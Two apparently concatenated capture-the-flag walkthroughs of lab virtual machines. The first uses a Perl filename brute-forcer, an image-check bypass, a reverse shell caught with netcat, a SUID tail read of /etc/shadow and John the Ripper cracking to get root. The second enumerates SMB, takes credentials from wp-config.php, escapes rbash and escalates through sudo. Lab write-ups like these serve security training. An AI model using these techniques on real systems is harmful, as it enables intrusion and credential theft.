root@ubuntu:~# nmap -sS -sV -sC -O -T5 -Pn 192.168.0.35

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-14 16:37 MDT
Nmap scan report for 192.168.0.35
Host is up (0.00060s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (EdDSA)
8000/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 2 disallowed entries 
|_/upload.php /uploads
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blog – Just another WordPress site
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.35 seconds
root@ubuntu:~# 

We get some interesting results back from nmap. First its running a httpd on port 8000 and looks like a wordpress default site. Lets check out robots.txt and see what it says.

http://192.168.0.35:8000/robots.txt

User-agent:*
Disallow:/upload.php
Disallow:/uploads

We get a 403 forbidden on the upload directory but we can access the upload.php page. If we view-source on the uploads page we find a hint.

https://github.com/fatihhcelik/Vulnerable-Machine---Hint/blob/master/upload.php

It seems to be the source code of uploads.php and we can see that there are some vulnerabities in the script. The first thing that sticks out in this code is the md5 function.

$rand_number = rand(1,100);
$target_dir = "uploads/";
$target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
$file_name = $target_dir . basename($_FILES["file"]["name"]);

It gets the name of the file and appends a random number between 1 and 100 to the end of the file and the hashes the resulting file name to a md5 hash. We can write a script to brute force the resulting filename in perl as below.

#!/usr/bin/env perl
use strict;
use warnings;
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;

my @files;
my $host = "http://192.168.0.35:8000";
my $file = "php-reverse-shell.php";

my $ua = LWP::UserAgent->new(timeout => 10);

push(@files,md5_hex($file.$_).".php") for (0..100);

foreach my $file (@files) {

    my $res = $ua->get($host."/uploads/".$file);

    if ($res->status_line =~ m/(\d+)\s(.*)/g) {
        if ($1 =~ m/200/) {
            print "[+] Page Found (200) OK: $host/uploads/$file\n";
     }
 }
}

Next is the file type check. It has a weak way of checking if the file being uploaded is really an image or something else. This can be bypassed by prepending a GIF89; before our shell code to pass the check on the server which should allow us to upload our remote file. For the shell I chose a connect back shell from pentestmonkey.net

if($check["mime"] == "image/png" || $check["mime"] == "image/gif")

Now we can try to upload the file and see if we can brute force the correct file name with our script we wrote eailer. Once uploaded, we run the script and get a successful connect back of the remote system to our machine.

root@ubuntu:~# nc -v -l -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 192.168.0.35 54446 received!
Linux 1afdd1f6b82c 4.15.0-29-generic #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018 x86_64 GNU/Linux
 23:37:18 up  1:02,  0 users,  load average: 0.08, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$   

We check /etc/passwd for any additional users on the system that might be of some intrest to us.

www-data@1afdd1f6b82c:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
www-data@1afdd1f6b82c:/home$ 

We dont find any other users on the system that can login so we will search for SUID binaries next.

www-data@1afdd1f6b82c:/home$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn
/bin/mount
/bin/umount
/bin/su
www-data@1afdd1f6b82c:/home$ 

We see the tail utility is SUID able. This means we can read the /etc/shadow file and extract the hashed password of root to crack.

www-data@1afdd1f6b82c:/home$ tail -n25 /etc/shadow
tail -n25 /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
www-data@1afdd1f6b82c:/home$ 

Once we have the has we go ahead and fire up JohnTheRipper and start cracking.

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/hackinos.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john             (root)
1g 0:00:00:03 DONE (2019-10-14 17:46) 0.2702g/s 1798p/s 1798c/s 1798C/s honeybear..98765432
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run# 

Cracking didnt take to long the password being john was really easy to guess. So lets try to su to root from our shell we have on www-data.

www-data@1afdd1f6b82c:/home$ su root
su root
Password: john

root@1afdd1f6b82c:/home# id
id
uid=0(root) gid=0(root) groups=0(root)
root@1afdd1f6b82c:/home# whoami
whoami
root
root@1afdd1f6b82c:/home# 

Success! Now lets look for some flags maybe contained in the /root directory of the host.

root@1afdd1f6b82c:/home# cd /root
cd /root
root@1afdd1f6b82c:~# ls -la
ls -la
total 36
drwx------ 1 root root 4096 Mar  1  2019 .
drwxr-xr-x 1 root root 4096 Feb 23  2019 ..
-rw------- 1 root root   57 Mar  1  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 2 root root 4096 Feb 24  2019 .nano
-rw-rw-rw- 1 root root   28 Feb 28  2019 .port
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  169 Feb  9  2019 .wget-hsts
-rw-r--r-- 1 root root   27 Feb 28  2019 flag
root@1afdd1f6b82c:~# cat flag
cat flag
Life consists of details..
root@1afdd1f6b82c:~# 

VulnHub: LazySysAdmin Walkthrough

We first start off with a nmap scan of the remote host.

root@ubuntu:~# nmap -Pn -sS -sV -sC -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-11 19:30 MDT
Nmap scan report for raven.local (192.168.56.101)
Host is up (0.00098s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.56.1
|_  error: Closing link: (nmap@192.168.56.1) [Client exited]
MAC Address: 08:00:27:1D:69:9D (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-10-12T05:30:43+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-11 13:30:43
|_  start_date: 1600-12-31 17:00:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.19 seconds
root@ubuntu:~# 

Here we have an HTTP server running on the remote hosts and a robots.txt exists. nmap provides us with the entries of the robots.txt for easy access.

80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode

We ran dirb against the website and found some interesting directories.

http://192.168.56.101/info.php
http://192.168.56.101/phpmyadmin/

If we look at http://192.168.56.101/info.php it gives us a lot of good information like kernel version and other php related information.

Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686

PHP/5.5.9-1ubuntu4.22

mysql 5.5.57

_SERVER["DOCUMENT_ROOT"] /var/www/html

allow_url_fopen 	On
allow_url_include	Off

open_basedir	no value

The site is running wordpress 4.8.1 which isnt vulnerable to any exploits according to searchsploit so I move on to try and brute force the admin login for wordpress.

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

I tried to brute force the admin login of wordpress with wpscan but it didnt pan out. So now I moved on to SMB enueration.

SMB Enumeration

If we look at the results of the nmap scan we can see the remote host is serving up shares.

Host script results:
|_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-10-12T05:30:43+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-11 13:30:43
|_  start_date: 1600-12-31 17:00:04

We'll start off using smbclient to see what we can do.

root@ubuntu:~# smbclient -L //192.168.56.101 -N
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAZYSYSADMIN
root@ubuntu:~# 

We can see three shares are present but the share 'share$' looks interesting. Lets try to connect to the share with no password.

root@ubuntu:~# smbclient -N //192.168.56.101/share$
WARNING: The "syslog" option is deprecated 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 15 05:05:52 2017
  ..                                  D        0  Mon Aug 14 06:34:47 2017
  wordpress                           D        0  Tue Aug 15 05:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 06:08:26 2017
  wp                                  D        0  Tue Aug 15 04:51:23 2017
  deets.txt                           N      139  Mon Aug 14 06:20:05 2017
  robots.txt                          N       92  Mon Aug 14 06:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 06:39:56 2017
  apache                              D        0  Mon Aug 14 06:35:19 2017
  index.html                          N    36072  Sat Aug  5 23:02:15 2017
  info.php                            N       20  Tue Aug 15 04:55:19 2017
  test                                D        0  Mon Aug 14 06:35:10 2017
  old                                 D        0  Mon Aug 14 06:35:13 2017

		3029776 blocks of size 1024. 1435904 blocks available
smb: \> 

It drops us to the smb prompt meaning we can access the share anonymously. It looks like the share is the http document root. There are some interesting files like deets.txt and todolist.txt both of these we will download to our local box.

 get deets.txt
getting file \deets.txt of size 139 as deets.txt (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (4.5 KiloBytes/sec) (average 6.3 KiloBytes/sec)
smb: \> 

deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

todolist.txt

Prevent users from being able to view to web root using the local file browser

Another file I would like to get is the wp-config.php file to read the database user and password.

smb: \> cd wordpress
smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (190.3 KiloBytes/sec) (average 60.5 KiloBytes/sec)
smb: \wordpress\> 

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

Now that we have a database user and password we can go back and try to login to phpmyadmin and run queries that way.

We logged in successfully now let search the wp_users table for the logins to the blog.

It looks like we dont have permission to run the select query against the wordpress database.

If we go back and take a look at the clues we found earlier, we see that we have a password to some account on the server. My first instinct was to check SSH to see if maybe that was the users password. But we do not have a valid user name for the user yet. If we go back again to the blog running on the server we see this:

"My name is togie" prehaps the username for the SSH login is togie we fire up ssh and check.

root@ubuntu:~# ssh togie@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@192.168.56.101's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$

It Worked! Well great now we have shell access to the server let run a few command and see what we can find.

togie@LazySysAdmin:~$ cd ..
-rbash: cd: restricted
togie@LazySysAdmin:~$ echo $SHELL
/bin/rbash
togie@LazySysAdmin:~$ 

We are in a restricted environment. What we need to do is break out of this rbash shell to a regular bash shell. One thing we can't do is run any commands with a '/' in them, so to run a regular bash shell you would run 'bash -i' and then try and change directories.

togie@LazySysAdmin:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
togie@LazySysAdmin:~$ bash -i
togie@LazySysAdmin:~$ cd ..
togie@LazySysAdmin:/home$

Now that we have broken out of the restricted shell is time to check sudo and see what if any privleges the user togie has.

togie@LazySysAdmin:/home$ sudo -l
[sudo] password for togie: 
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
togie@LazySysAdmin:~$ sudo -s
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# 

We have all privleges and a root shell.